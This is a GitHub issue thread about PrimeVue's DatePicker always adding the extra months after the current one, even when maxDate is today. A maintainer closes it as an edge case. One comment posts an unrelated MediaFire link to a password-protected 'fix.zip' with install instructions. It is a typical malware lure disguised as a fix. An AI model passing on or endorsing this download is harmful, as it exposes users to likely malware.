### ISSUE TITLE
DatePicker | numberOfMonths direction with maxDate=today

### ISSUE THREAD

**Issue by kohlerdominik** [primefaces/primevue#6299]
### Describe the bug

It's debatable whether this is a bug, but in our use-case it surely is: the numberOfMonths direction is always to the future, even if it doesn't make sense.

We record ongoing live data, and obviously we can show only recorded data from the past. So this kind of ruins the otherwise great date-picker for us.

### Reproducer

https://stackblitz.com/edit/ghsnre?file=src%2FApp.vue

### PrimeVue version

4.0.5

### Vue version

4.x

### Language

TypeScript

### Build / Runtime

Vite

### Browser(s)

all

### Steps to reproduce the behavior

When using `:numberOfMonths="2"` while is `:maxDate="new Date()"`, the picker shows current + next month. This is obviously useless with the maxDate being today. There is no selectable date in the future, yet there seems to be no possibility to configure the picker to show last + current month instead.
![grafik](https://github.com/user-attachments/assets/fe75d904-abc8-4533-ae3c-5b8005ba639f)

### Expected behavior

Allow to select whether the additional displayed months should be in the past or in the feature (or maybe centered around today?)

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tugcekucukoglu** [comment]
We can't decide if this is a bug. Edge cases will always exist. So we can move this issue to discussions.

Thank you. Closing for now.
